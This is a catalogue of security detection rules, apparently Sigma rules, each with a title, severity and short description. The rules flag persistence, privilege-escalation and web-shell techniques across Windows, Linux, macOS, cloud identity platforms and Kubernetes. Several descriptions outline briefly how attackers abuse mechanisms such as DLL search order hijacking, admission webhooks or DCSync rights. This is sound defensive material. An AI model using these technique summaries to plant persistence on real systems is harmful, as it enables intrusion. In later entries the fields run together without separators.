Svchost DLL Search Order Hijack | high | Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system. The IKEEXT and SessionEnv services call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services ("svchost.exe -k netsvcs") to gain code execution on a remote machine.
Suspicious Get-WmiObject | low | Detects suspicious use of the Get-WmiObject cmdlet. WMI is the infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers.
New Service Creation | low | Detects creation of a new service.
Suspicious Bitsadmin Job via PowerShell | high | Detects downloads by BITS jobs via PowerShell.
Suspicious Bitstransfer via PowerShell | medium | Detects transferring files from a system using the BitsTransfer PowerShell cmdlets.
Autorun Keys Modification | medium | Detects modification of autostart extensibility points (ASEP) in the registry.
Abusing Windows Telemetry For Persistence - Registry | high | Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end it relies on the registry to instruct it which commands to run. The problem is that it will run any arbitrary command without restriction of location or type.
Potential Persistence Via COM Hijacking From Suspicious Locations | high | Detects potential COM object hijacking where the "Server" (In/Out) is pointing to a suspicious or unusual location.
Potential Persistence Via COM Search Order Hijacking | medium | Detects potential COM object hijacking leveraging the COM search order.
SilentProcessExit Monitor Registration | high | Detects changes to the registry in which a monitor program gets registered to monitor the exit of another process.
Kubernetes CronJob/Job Modification | medium | Detects when a Kubernetes CronJob or Job is created or modified. A Kubernetes Job creates one or more pods to accomplish a specific task, and a CronJob creates Jobs on a recurring schedule. An adversary can take advantage of this Kubernetes object to schedule Jobs that run containers executing malicious code within a cluster, allowing them to achieve persistence.
Kubernetes Admission Controller Modification | medium | Detects when a modification (create, update or replace) action is taken that affects mutating or validating webhook configurations, as they can be used by an adversary to achieve persistence or exfiltrate access credentials.
OpenCanary - SSH Login Attempt | high | Detects instances where an SSH service on an OpenCanary node has had a login attempt.
OpenCanary - SSH New Connection Attempt | high | Detects instances where an SSH service on an OpenCanary node has had a connection attempt.
Antivirus Web Shell Detection | high | Detects a highly relevant antivirus alert that reports a web shell. It is highly recommended to tune this rule to the specific strings used by your antivirus solution by downloading a big web shell repository from e.g. GitHub and checking the matches. This event must not be ignored just because the AV has blocked the malware; investigate how it got there in the first place.
AWS Key Pair Import Activity | medium | Detects the import of SSH key pairs into AWS EC2, which may indicate an attacker attempting to gain unauthorized access to instances. This activity could lead to initial access, persistence, or privilege escalation, potentially compromising sensitive data and operations.
AWS ECS Task Definition That Queries The Credential Endpoint | medium | Detects when an Elastic Container Service (ECS) task definition includes a command to query the credential endpoint. This can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.
AWS ElastiCache Security Group Created | low | Detects when an ElastiCache security group has been created.
AWS IAM Backdoor Users Keys | medium | Detects AWS API key creation for a user by another user. Backdoored users can be used to obtain persistence in the AWS environment. This alert also lets you track the flow of AWS keys in your org.
AWS IAM S3Browser Templated S3 Bucket Policy Creation | high | Detects the S3 Browser utility creating an inline IAM policy containing the default S3 bucket name placeholder value of "".
AWS IAM S3Browser LoginProfile Creation | high | Detects the S3 Browser utility performing reconnaissance, looking for existing IAM users without a LoginProfile defined and then (when found) creating a LoginProfile.
AWS IAM S3Browser User or AccessKey Creation | high | Detects the S3 Browser utility creating an IAM user or access key.
AWS Route 53 Domain Transfer Lock Disabled | low | Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.
AWS Route 53 Domain Transferred to Another Account | low | Detects when a request has been made to transfer a Route 53 domain to another AWS account.
AWS Identity Center Identity Provider Change | high | Detects a change in the AWS Identity Center (formerly AWS SSO) identity provider. A change in identity provider allows an attacker to establish persistent access or escalate privileges via user impersonation.
AWS User Login Profile Was Modified | high | Detects activity where someone is changing passwords on behalf of other users. An attacker with the "iam:UpdateLoginProfile" permission on other users can change the password used to log in to the AWS console for any user that already has a login profile set up.
User Added to an Administrator's Azure AD Role | medium | Detects when a user is added to an administrative Azure AD role.
Number Of Resource Creation Or Deployment Activities | medium | Detects a number of VM creation or deployment activities occurring in Azure via the AzureActivity log.
Granting Of Permissions To An Account | medium | Identifies IPs from which users grant access to other users on Azure resources and alerts when a previously unseen source IP address is used.
Azure Kubernetes Admission Controller | medium | Identifies when an admission controller is executed in Azure Kubernetes. A Kubernetes admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use a MutatingAdmissionWebhook to obtain persistence in the cluster; for example, attackers can intercept and modify pod creation operations and add their malicious container to every created pod. A ValidatingAdmissionWebhook could be used to obtain access credentials: an adversary could use it to intercept requests to the API server and record secrets and other sensitive information.
Azure Kubernetes CronJob | medium | Identifies when an Azure Kubernetes CronJob runs in Azure Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Jobs can be used to run containers that perform finite tasks for batch work. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a CronJob to schedule execution of malicious code that would run as a container in the cluster.
Disabled MFA to Bypass Authentication Mechanisms | medium | Detects when multi-factor authentication has been disabled, which might indicate malicious activity to bypass authentication mechanisms.
CA Policy Removed by Non Approved Actor | medium | Monitor and alert on conditional access changes where a non-approved actor removed a CA policy.
CA Policy Updated by Non Approved Actor | medium | Monitor and alert on conditional access changes. Is the initiator (actor) approved to make changes? Review Modified Properties and compare the "old" vs "new" value.
Certificate-Based Authentication Enabled | medium | Detects when certificate-based authentication has been enabled in an Azure Active Directory tenant.
New Root Certificate Authority Added | medium | Detects a newly added root certificate authority in an Azure AD tenant to support certificate-based authentication.
Application AppID Uri Configuration Changes | high | Detects when a configuration change is made to an application's AppID URI.
Added Credentials to Existing Application | high | Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.
App Granted Privileged Delegated Or App Permissions | high | Detects when an administrator grants either application permissions (app roles) or highly privileged delegated permissions.
App Assigned To Azure RBAC/Microsoft Entra Role | medium | Detects when an app is assigned Azure AD roles, such as Global Administrator, or Azure RBAC roles, such as subscription Owner.
Application URI Configuration Changes | high | Detects when a configuration change is made to an application's URI. URIs for domain names that no longer exist (dangling URIs), URIs not using HTTPS, wildcards at the end of the domain, URIs that are not unique to that app, or URIs that point to domains you do not control should be investigated.
Change to Authentication Method | medium | A change to an authentication method could be an indicator of an attacker adding an auth method to the account so they can have continued access.
User Added To Group With CA Policy Modification Access | medium | Monitor and alert on membership additions to groups that have CA policy modification access.
User Removed From Group With CA Policy Modification Access | medium | Monitor and alert on membership removals from groups that have CA policy modification access.
Guest User Invited By Non Approved Inviters | medium | Detects when a user that doesn't have permissions to invite a guest user attempts to invite one.
PIM Alert Setting Changes To Disabled | high | Detects when PIM alerts are set to disabled.
Changes To PIM Settings | high | Detects when changes are made to PIM roles.
Bulk Deletion Changes To Privileged Account Permissions | high | Detects when a user is removed from a privileged role. Bulk changes should be investigated.
Privileged Account Creation | medium | Detects when a new admin is created.
Temporary Access Pass Added To An Account | high | Detects when a temporary access pass (TAP) is added to an account. TAPs added to privileged accounts should be investigated.
User Risk and MFA Registration Policy Updated | high | Detects changes and updates to the user risk and MFA registration policy. Attackers can modify the policies to bypass MFA, weaken security thresholds, facilitate further attacks, or maintain persistence.
Multi Factor Authentication Disabled For User Account | medium | Detects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled". Threat actors have been seen disabling multi-factor authentication for users in order to maintain or achieve access to the account. Also seen in SIM swap attacks.
Password Reset By User Account | medium | Detects when a user has reset their password in Azure AD.
Anomalous User Activity | high | Indicates that there are anomalous patterns of behavior, like suspicious changes to the directory.
Activity From Anonymous IP Address | high | Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.
Atypical Travel | high | Identifies two sign-ins originating from geographically distant locations, where at least one of the locations may also be atypical for the user, given past behavior.
Impossible Travel | high | Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.
Suspicious Browser Activity | high | Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser.
Azure AD Threat Intelligence | high | Indicates user activity that is unusual for the user or consistent with known attack patterns.
New Country | high | Detects sign-ins from new countries. The detection considers past activity locations to determine new and infrequent locations.
Unfamiliar Sign-In Properties | high | Detects sign-ins with properties that are unfamiliar for the user. The detection considers past sign-in history to look for anomalous sign-ins.
Stale Accounts In A Privileged Role | high | Identifies when an account hasn't signed in during the past n days.
Invalid PIM License | high | Identifies when an organization doesn't have the proper license for PIM and is out of compliance.
Roles Assigned Outside PIM | high | Identifies when a privileged role assignment has taken place outside of PIM and may indicate an attack.
Roles Activation Doesn't Require MFA | high | Identifies when a privileged role can be activated without performing MFA.
Roles Activated Too Frequently | high | Identifies when the same privileged role has multiple activations by the same user.
Roles Are Not Being Used | high | Identifies when a user has been assigned a privileged role and is not using that role.
Too Many Global Admins | high | Identifies an event where too many accounts are assigned the Global Administrator role.
Application Using Device Code Authentication Flow | medium | Device code flow is an OAuth 2.0 protocol flow specifically for input-constrained devices and is not used in all environments. If this type of flow is seen in the environment and is not being used in an input-constrained device scenario, further investigation is warranted. This can be a misconfigured application or potentially something malicious.
Applications That Are Using ROPC Authentication Flow | medium | Resource owner password credentials (ROPC) should be avoided if at all possible, as this requires the user to expose their current password credentials to the application directly. The application then uses those credentials to authenticate the user against the identity provider.
Bitbucket Global Permission Changed | medium | Detects global permission change activity.
GCP Access Policy Deleted | medium | Detects when an access policy that is applied to a GCP cloud resource is deleted. An adversary would be able to remove access policies to gain access to a GCP cloud resource.
Google Cloud Kubernetes Admission Controller | medium | Identifies when an admission controller is executed in GCP Kubernetes. A Kubernetes admission controller intercepts, and possibly modifies, requests to the Kubernetes API server. The behavior of this admission controller is determined by an admission webhook (MutatingAdmissionWebhook or ValidatingAdmissionWebhook) that the user deploys in the cluster. An adversary can use a MutatingAdmissionWebhook to obtain persistence in the cluster; for example, attackers can intercept and modify pod creation operations and add their malicious container to every created pod. A ValidatingAdmissionWebhook could be used to obtain access credentials: an adversary could use it to intercept requests to the API server and record secrets and other sensitive information.
Google Cloud Kubernetes CronJob | medium | Identifies when a Google Cloud Kubernetes CronJob runs in Google Cloud. A Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Jobs can be used to run containers that perform finite tasks for batch work. A Kubernetes CronJob is used to schedule Jobs. An adversary may use a CronJob to schedule execution of malicious code that would run as a container in the cluster.
Google Workspace Application Access Level Modified | medium | Detects when an access level is changed for a Google Workspace application. An access level is part of BeyondCorp Enterprise, which is Google Workspace's way of enforcing a Zero Trust model. An adversary would be able to remove access levels to gain easier access to Google Workspace resources.
Google Workspace Granted Domain API Access | medium | Detects when an API access service account is granted domain-wide authority.
Google Workspace User Granted Admin Privileges | medium | Detects when a Google Workspace user is granted admin privileges.
Github High Risk Configuration Disabled | high | Detects when a user disables a critical security feature for an organization.
Github Fork Private Repositories Setting Enabled/Cleared | medium | Detects when the policy allowing forks of private and internal repositories is changed (enabled or cleared).
New Github Organization Member Added | informational | Detects when a new member is added or invited to a GitHub organization.
Github New Secret Created | low | Detects when a user creates an Actions secret for the organization, environment, codespaces or repository.
Github Outside Collaborator Detected | medium | Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed, when an owner removes an outside collaborator from an organization, or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
Github Repository/Organization Transferred | medium | Detects when a repository or an organization is being transferred to another location.
Github Self Hosted Runner Changes Detected | low | A self-hosted runner is a system that you deploy and manage to execute jobs from GitHub Actions on GitHub.com. This rule detects changes to self-hosted runner configurations in the environment. Once detected, the configuration change should be validated from the GitHub UI because the log entry may not provide full context.
Github SSH Certificate Configuration Changed | medium | Detects when changes are made to the SSH certificate configuration of the organization.
Disabling Multi Factor Authentication | high | Detects disabling of multi-factor authentication.
New Federated Domain Added | medium | Detects the addition of a new federated domain.
New Federated Domain Added - Exchange | medium | Detects the addition of a new federated domain.
Okta Admin Role Assigned to an User or Group | medium | Detects when the Administrator role is assigned to a user or group.
Okta Admin Role Assignment Created | medium | Detects when a new admin role assignment is created, which could be a sign of privilege escalation or persistence.
Okta API Token Created | medium | Detects when an API token is created.
Okta Identity Provider Created | medium | Detects when a new identity provider is created for Okta.
Okta MFA Reset or Deactivated | medium | Detects an attempt at deactivating or resetting MFA.
Creation Of An User Account | medium | Detects the creation of a new user account. Such accounts may be used for persistence and do not require persistent remote access tools to be deployed on the system.
Loading of Kernel Module via Insmod | high | Detects loading of kernel modules with the insmod command. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded into and unloaded from the kernel on demand. Adversaries may use LKMs to obtain persistence within the system or elevate privileges.
Systemd Service Reload or Start | low | Detects a reload or a start of a service.
Systemd Service Creation | medium | Detects the creation of systemd services, which could be used by adversaries to execute malicious code.
Unix Shell Configuration Modification | medium | Detects Unix shell configuration modification. Adversaries may establish persistence by executing malicious commands triggered when a new shell is opened.
Webshell Remote Command Execution | critical | Detects possible command execution by a web application/web shell.
Code Injection by ld.so Preload | high | Detects the ld.so preload persistence file. See `man ld.so` for more information.
Potential Suspicious BPF Activity - Linux | high | Detects the presence of "bpf_probe_write_user" BPF helper-generated warning messages, which could be a sign of suspicious eBPF activity on the system.
Shellshock Expression | high | Detects Shellshock expressions in log files.
Privileged User Has Been Created | high | Detects the addition of a new user to a privileged group such as "root" or "sudo".
Modifying Crontab | medium | Detects suspicious modification of the crontab file.
Persistence Via Sudoers Files | medium | Detects creation of a sudoers file or files in the "sudoers.d" directory, which can be used as a potential method to persist privileges for a specific user.
Potentially Suspicious Shell Script Creation in Profile Folder | low | Detects the creation of shell scripts under the "profile.d" path.
Persistence Via Cron Files | medium | Detects creation of a cron file or files in cron directories, which could indicate potential persistence.
Triple Cross eBPF Rootkit Default Persistence | high | Detects the creation of "ebpfbackdoor" files in both the "cron.d" and "sudoers.d" directories, both of which are related to the TripleCross persistence method.
Potentially Suspicious Malware Callback Communication - Linux | high | Detects programs that connect to known malware callback ports based on threat intelligence reports.
Scheduled Task/Job At | low | Detects the use of at/atd, which are utilities used to schedule tasks. They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code.
ESXi Account Creation Via ESXCLI | medium | Detects user account creation on an ESXi system via esxcli.
Scheduled Cron Task/Job - Linux | medium | Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection focuses on crontab jobs uploaded from the tmp folder.
Setuid and Setgid | low | Detects suspicious changes of file privileges with the chown and chmod commands.
Potential Linux Amazon SSM Agent Hijacking | medium | Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
User Added To Root/Sudoers Group Using Usermod | medium | Detects usage of the "usermod" binary to add users to the root or sudoers groups.
Linux Webshell Indicators | high | Detects suspicious sub-processes of web server processes.
MacOS Emond Launch Daemon | medium | Detects additions to the Emond launch daemon that adversaries may use to gain persistence and elevate privileges.
Startup Item File Created - MacOS | low | Detects the creation of a startup item plist file, which automatically gets executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.
Creation Of A Local User Account | low | Detects the creation of a new user account. Such accounts may be used for persistence and do not require persistent remote access tools to be deployed on the system.
Root Account Enable Via Dsenableroot | medium | Detects attempts to enable the root account via "dsenableroot".
Launch Agent/Daemon Execution Via Launchctl | medium | Detects the execution of programs as Launch Agents or Launch Daemons using launchctl on macOS.
Suspicious Microsoft Office Child Process - MacOS | high | Detects suspicious child processes spawning from Microsoft Office suite applications such as Word or Excel. This could indicate malicious macro execution.
Potential Persistence Via PlistBuddy | high | Detects potential persistence activity using LaunchAgents or LaunchDaemons via the PlistBuddy utility.
Scheduled Cron Task/Job - MacOs | medium | Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection focuses on crontab jobs uploaded from the tmp folder.
Suspicious Execution via macOS Script Editor | medium | Detects when the macOS Script Editor utility spawns an unusual child process.
Cisco Local Accounts | high | Finds local accounts being created or modified, as well as remote authentication configurations.
Cisco Modify Configuration | medium | Modifications to a configuration that will serve an adversary's impact or persistence.
Cisco BGP Authentication Failures | low | Detects BGP authentication failures which may be indicative of brute force attacks to manipulate routing.
Cisco LDP Authentication Failures | low | Detects LDP authentication failures which may be indicative of brute force attacks to manipulate MPLS labels.
Huawei BGP Authentication Failures | low | Detects BGP authentication failures which may be indicative of brute force attacks to manipulate routing.
Juniper BGP Missing MD5 | low | Detects a Juniper BGP session missing the MD5 digest, which may be indicative of brute force attacks to manipulate routing.
MITRE BZAR Indicators for Persistence | medium | Windows DCE-RPC functions which indicate persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.
Remote Task Creation via ATSVC Named Pipe - Zeek | medium | Detects remote task creation via at.exe or API interacting with the ATSVC named pipe.
Bitsadmin to Uncommon IP Server Address | high | Detects Bitsadmin connections to IP addresses instead of FQDNs.
Bitsadmin to Uncommon TLD | high | Detects Bitsadmin connections to domains with uncommon TLDs.
Suspicious Windows Strings In URI | high | Detects suspicious Windows strings in a URI which could indicate possible exfiltration or web shell communication.
Webshell ReGeorg Detection Via Web Logs | high | Certain strings in the uri_query field, when combined with a null referer and null user agent, can indicate activity associated with the ReGeorg web shell.
Windows Webshell Strings | high | Detects common commands used in Windows web shells.
MSSQL Add Account To Sysadmin Role | high | Detects when an attacker tries to backdoor the MSSQL server by adding a backdoor account to the sysadmin fixed server role.
MSSQL SPProcoption Set | high | Detects when a stored procedure is set or cleared for automatic execution in MSSQL. A stored procedure that is set to automatic execution runs every time an instance of SQL Server is started.
New BITS Job Created Via Bitsadmin | low | Detects the creation of a new BITS job by Bitsadmin.
New BITS Job Created Via PowerShell | low | Detects the creation of a new BITS job by PowerShell.
BITS Transfer Job Downloading File Potential Suspicious Extension | medium | Detects a new BITS transfer job saving local files with potentially suspicious extensions.
BITS Transfer Job Download From File Sharing Domains | high | Detects a BITS transfer job downloading files from a file sharing domain.
BITS Transfer Job Download From Direct IP | high | Detects a BITS transfer job downloading file(s) from a direct IP address.
BITS Transfer Job With Uncommon Or Suspicious Remote TLD | medium | Detects a suspicious download using the BITS client from an FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.
BITS Transfer Job Download To Potential Suspicious Folder | high | Detects a new BITS transfer job where the LocalName/saved file is stored in a potentially suspicious location.
New Module Module Added To IIS ServermediumDetects the addition of a new module to an IIS server.
Previously Installed IIS Module Was RemovedlowDetects the removal of a previously installed IIS module.
Mailbox Export to Exchange WebservercriticalDetects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
Certificate Request Export to Exchange WebservercriticalDetects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell
Exchange Set OabVirtualDirectory ExternalUrl PropertyhighRule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log
MSExchange Transport Agent Installation - BuiltinmediumDetects the Installation of a Exchange Transport Agent
Failed MSExchange Transport Agent InstallationhighDetects a failed installation of a Exchange Transport Agent
Powerview Add-DomainObjectAcl DCSync AD Extend RighthighBackdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer
Enabled User Right in AD to Control User ObjectshighDetects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.
Active Directory User BackdoorshighDetects scenarios where one can control another users or computers account without having to use their credentials.
Remote Task Creation via ATSVC Named PipemediumDetects remote task creation via at.exe or API interacting with ATSVC namedpipe
Persistence and Execution at Scale via GPO Scheduled TaskhighDetect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale
Hidden Local User CreationhighDetects the creation of a local hidden user account which should not happen for event ID 4720.
HybridConnectionManager Service InstallationhighRule to detect the Hybrid Connection Manager service installation.
Windows Network Access Suspicious desktop.ini ActionmediumDetects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
Service Registry Key Read Access RequestlowDetects "read access" requests on the services registry key. Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.
Remote Access Tool Services Have Been Installed - SecuritymediumDetects service installation of different remote access tools software. These software are often abused by threat actors to perform
A New Trust Was Created To A DomainmediumAddition of domains is seldom and should be verified for legitimacy.
Win Susp Computer Name Containing SamtheadmincriticalDetects suspicious computer name samtheadmin-{1..100}$ generated by hacktool
Addition of SID History to Active Directory ObjectmediumAn attacker can use the SID history attribute to gain additional privileges.
Password Change on Directory Service Restore Mode (DSRM) AccounthighDetects potential attempts made to set the Directory Services Restore Mode administrator password. The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password in order to obtain persistence.
Account Tampering - Suspicious Failed Logon ReasonsmediumThis method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.
Suspicious Windows ANONYMOUS LOGON Local Account CreatedhighDetects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.
Suspicious Scheduled Task CreationhighDetects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.
Important Scheduled Task Deleted/DisabledhighDetects when adversaries stop services or processes by deleting or disabling their respective scheduled tasks in order to conduct data destructive activities
Suspicious Scheduled Task UpdatehighDetects update to a scheduled task event that contain suspicious keywords.
Remote Service Activity via SVCCTL Named PipemediumDetects remote service activity via remote access to the svcctl named pipe
User Added to Local Administrator GroupmediumDetects the addition of a new member to the local administrator group, which could be legitimate activity or a sign of privilege escalation activity
Local User CreationlowDetects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.
WMI Persistence - SecuritymediumDetects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
A Member Was Removed From a Security-Enabled Global GrouplowDetects activity when a member is removed from a security-enabled global group
A Member Was Added to a Security-Enabled Global GrouplowDetects activity when a member is added to a security-enabled global group
A Security-Enabled Global Group Was DeletedlowDetects activity when a security-enabled global group is deleted
Failed Logon From Public IPmediumDetects a failed logon attempt from a public IP. A login from a public IP can indicate a misconfigured firewall or network boundary.
HybridConnectionManager Service RunninghighRule to detect the Hybrid Connection Manager service running on an endpoint.
Moriya Rootkit - SystemcriticalDetects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
Anydesk Remote Access Software Service InstallationmediumDetects the installation of the anydesk software service. Which could be an indication of anydesk abuse if you the software isn't already used.
NetSupport Manager Service InstallmediumDetects NetSupport Manager service installation on the target system.
Remote Access Tool Services Have Been Installed - SystemmediumDetects service installation of different remote access tools software. These software are often abused by threat actors to perform
Remote Utilities Host Service InstallmediumDetects Remote Utilities Host service installation on the target system.
Suspicious Service InstallationhighDetects suspicious service installation commands
Uncommon Service Installation Image PathmediumDetects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.
RTCore Suspicious Service InstallationhighDetects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse
Service Installation in Suspicious FoldermediumDetects service installation in suspicious folder appdata
Service Installation with Suspicious Folder PatternhighDetects service installation with suspicious folder patterns
Suspicious Service Installation ScripthighDetects suspicious service installation scripts
Scheduled Task Executed From A Suspicious LocationmediumDetects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task
Scheduled Task Executed Uncommon LOLBINmediumDetects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task
WMI PersistencemediumDetects suspicious WMI event filter and command line event consumer based on WMI and Security Logs.
Potential Suspicious Winget Package InstallationhighDetects potential suspicious winget package installation from a suspicious source.
DNS HybridConnectionManager Service BushighDetects Azure Hybrid Connection Manager services querying the Azure service bus service
Driver Load From A Temporary DirectoryhighDetects a driver load from a temporary directory
Potential PrintNightmare Exploitation AttempthighDetect DLL deletions from Spooler Service driver folder. This might be a potential exploitation attempt of CVE-2021-1675
Creation Of Non-Existent System DLLmediumDetects the creation of system DLLs that are usually not present on the system (or at least not in system directories). Usually this technique is used to achieve DLL hijacking.
New Custom Shim Database CreatedmediumAdversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.
Suspicious Screensaver Binary File CreationmediumAdversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
Creation Exe for Service with Unquoted PathhighAdversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
DLL Search Order Hijackig Via Additional Space in PathhighDetects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...) but with a space in order to trick DLL load search order and perform a "DLL Search Order Hijacking" attack
Potential Persistence Attempt Via ErrorHandler.CmdmediumDetects creation of a file named "ErrorHandler.cmd" in the "C:\WINDOWS\Setup\Scripts\" directory which could be used as a method of persistence The content of C:\WINDOWS\Setup\Scripts\ErrorHandler.cmd is read whenever some tools under C:\WINDOWS\System32\oobe\ (e.g. Setup.exe) fail to run for any reason.
Suspicious ASPX File Drop by ExchangehighDetects suspicious file type dropped by an Exchange component in IIS into a suspicious folder
Suspicious File Drop by ExchangemediumDetects suspicious file type dropped by an Exchange component in IIS
HackTool - Powerup Write Hijack DLLhighPowerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default).
Malicious DLL File Dropped in the Teams or OneDrive FolderhighDetects creation of a malicious DLL file in the location where the OneDrive or Team applications Upon execution of the Teams or OneDrive application, the dropped malicious DLL file ("iphlpapi.dll") is sideloaded
File Creation In Suspicious Directory By Msdt.EXEhighDetects msdt.exe creating files in suspicious directories which could be a sign of exploitation of either Follina or Dogwalk vulnerabilities
Potential Persistence Via Notepad++ PluginsmediumDetects creation of new ".dll" files inside the plugins directory of a notepad++ installation by a process other than "gup.exe". Which could indicates possible persistence
Potential Persistence Via Microsoft Office Add-InhighDetects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
New Outlook Macro CreatedmediumDetects the creation of a macro file for Outlook.
Suspicious Outlook Macro CreatedhighDetects the creation of a macro file for Outlook.
Potential Persistence Via Microsoft Office Startup FolderhighDetects creation of Microsoft Office files inside of one of the default startup folders in order to achieve persistence.
Potential Persistence Via Outlook FormhighDetects the creation of a new Outlook form which can contain malicious code
Potential Binary Or Script Dropper Via PowerShellmediumDetects PowerShell creating a binary executable or a script file.
PowerShell Script Dropped Via PowerShell.EXElowDetects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
PowerShell Module File CreatedlowDetects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
PowerShell Module File Created By Non-PowerShell ProcessmediumDetects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
Potential Suspicious PowerShell Module File CreatedmediumDetects the creation of a new PowerShell module in the first folder of the module directory structure "\WindowsPowerShell\Modules\malware\malware.psm1". This is somewhat an uncommon practice as legitimate modules often includes a version folder.
Potential Startup Shortcut Persistence Via PowerShell.EXEhighDetects PowerShell writing startup shortcuts. This procedure was highlighted in Red Canary Intel Insights Oct. 2021, "We frequently observe adversaries using PowerShell to write malicious .lnk files into the startup directory to establish persistence. Accordingly, this detection opportunity is likely to identify persistence mechanisms in multiple threats. In the context of Yellow Cockatoo, this persistence mechanism eventually launches the command-line script that leads to the installation of a malicious DLL"
Potential RipZip Attack on Startup FolderhighDetects a phishing attack which expands a ZIP file containing a malicious shortcut. If the victim expands the ZIP file via the explorer process, then the explorer process expands the malicious ZIP file and drops a malicious shortcut redirected to a backdoor into the Startup folder. Additionally, the file name of the malicious shortcut in Startup folder contains {0AFACED1-E828-11D1-9187-B532F1E9575D} meaning the folder shortcut operation.
Startup Folder File WritemediumA General detection for files being created in the Windows startup directory. This could be an indicator of persistence.
Suspicious desktop.ini ActionmediumDetects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.
Suspicious MSExchangeMailboxReplication ASPX WritehighDetects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
Suspicious Get-Variable.exe CreationhighGet-Variable is a valid PowerShell cmdlet WindowsApps is by default in the path where PowerShell is executed. So when the Get-Variable command is issued on PowerShell execution, the system first looks for the Get-Variable executable in the path and executes the malicious binary instead of looking for the PowerShell cmdlet.
PowerShell Profile ModificationmediumDetects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
Suspicious File Creation Activity From Fake Recycle.Bin FolderhighDetects file write event from/to a fake recycle bin folder that is often used as a staging directory for malware
Suspicious Startup Folder PersistencehighDetects when a file with a suspicious extension is created in the startup folder
Suspicious Scheduled Task Write to System32 TaskshighDetects the creation of tasks from processes executed from suspicious locations
VsCode Powershell Profile ModificationmediumDetects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
